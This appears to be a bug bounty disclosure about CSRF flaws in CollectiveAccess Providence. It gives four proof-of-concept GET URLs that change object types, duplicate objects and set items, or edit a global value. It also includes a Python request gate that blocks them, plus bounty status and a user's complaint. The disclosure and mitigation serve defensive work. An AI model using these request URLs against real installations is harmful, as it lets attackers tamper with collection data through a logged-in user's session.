Cross-Site Request Forgery (CSRF) in collectiveaccess/providence


Reported on Sep 26th 2021


I have found more endpoints which allow edit/duplicate actions that were not protected from CSRF. The endpoints are:

1: Edit Global Value in Pawtucket.

2: Change object type.

3: Duplicate object.

4: Duplicate items in the set and add to another set.

Proof of Concept

Via GET requests:
1. http://[URL]/providence/index.php/manage/Pawtucket/saveGlobalValues?_formName=globalValuesForm&form_timestamp=1632635941&hours_of_operation=ABC

2. http://[URL]/providence/index.php/editor/objects/ObjectEditor/ChangeType?_formName=caChangeTypeForm&form_timestamp=1632633565&type_id=23&object_id=7

3. http://[URL]/providence/index.php/editor/objects/ObjectEditor/Edit?_formName=DuplicateItemForm&object_id=34&mode=dupe

4. http://[URL]/providence/index.php/manage/sets/SetEditor/DuplicateItems?_formName=caDupeSetItemsForm&form_timestamp=1632634975&setForDupes=new&set_id=2


Compromise of the integrity and availability of objects.
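As an added example (not code from the report or from the CollectiveAccess project), the following Python request gate shows the mitigation the report calls for: each state-changing action listed above is accepted only as a POST carrying a per-session synchronizer token bound to its `_formName`, so the four PoC GETs (with a constructed host in place of `[URL]`) are all refused. The host name, the `_csrf_token` parameter and the `issue_token` helper are assumptions, not Providence's own names.

```python
import hmac
import secrets
from urllib.parse import urlsplit, parse_qs

# State-changing Providence actions named in the report (paths taken from the PoC URLs).
# For Edit, only the mode=dupe variant changes state, so the rule names that parameter.
STATE_CHANGING = {
    "/providence/index.php/manage/Pawtucket/saveGlobalValues": None,
    "/providence/index.php/editor/objects/ObjectEditor/ChangeType": None,
    "/providence/index.php/editor/objects/ObjectEditor/Edit": ("mode", "dupe"),
    "/providence/index.php/manage/sets/SetEditor/DuplicateItems": None,
}

def issue_token(session: dict, form_name: str) -> str:
    """Store and return a random synchronizer token bound to this session and form name (hypothetical helper)."""
    token = secrets.token_hex(16)
    session.setdefault("csrf", {})[form_name] = token
    return token

def check_request(method: str, url: str, form: dict, session: dict) -> tuple[bool, str]:
    """Gate a request and return (allowed, reason): a state-changing action is refused unless it
    is a POST whose _csrf_token matches the token the session holds for its _formName."""
    parts = urlsplit(url)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if parts.path not in STATE_CHANGING:
        return True, "not a state-changing action"
    rule = STATE_CHANGING[parts.path]
    if rule is not None and query.get(rule[0]) != rule[1]:
        return True, "read-only use of this action"
    if method != "POST":
        return False, "state change via GET refused"
    expected = session.get("csrf", {}).get(form.get("_formName", ""))
    supplied = form.get("_csrf_token", "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return False, "missing or invalid CSRF token"
    return True, "ok"

# The four PoC URLs from the report, with a constructed host in place of [URL].
POC_GETS = [
    "http://host.example/providence/index.php/manage/Pawtucket/saveGlobalValues?_formName=globalValuesForm&form_timestamp=1632635941&hours_of_operation=ABC",
    "http://host.example/providence/index.php/editor/objects/ObjectEditor/ChangeType?_formName=caChangeTypeForm&form_timestamp=1632633565&type_id=23&object_id=7",
    "http://host.example/providence/index.php/editor/objects/ObjectEditor/Edit?_formName=DuplicateItemForm&object_id=34&mode=dupe",
    "http://host.example/providence/index.php/manage/sets/SetEditor/DuplicateItems?_formName=caDupeSetItemsForm&form_timestamp=1632634975&setForDupes=new&set_id=2",
]

def audit_poc() -> list[str]:
    """Run every PoC GET through the gate; each one is refused before any state changes."""
    return [check_request("GET", u, {}, {})[1] for u in POC_GETS]
```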


For 3. Duplicate objects/sets

For 4. Duplicate Items in sets

For 1. Edit Global Value in Pawtucket

For 2. Change Type of Object

We have contacted a member of the collectiveaccess/providence team and are waiting to hear back (a year ago)
CollectiveAccess validated this vulnerability (a year ago)
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
CollectiveAccess confirmed that a fix has been merged on 23bb11 (a year ago)
CollectiveAccess has been awarded the fix bounty
displayHelpers.php#L1207 has been validated
displayHelpers.php#L1514 has been validated
change_type_html.php#L58 has been validated
(a year ago)

It is very interesting that you invalidated my reports but accepted this one!! :|

a year ago

@admin and @maintainer, really, why did this happen??
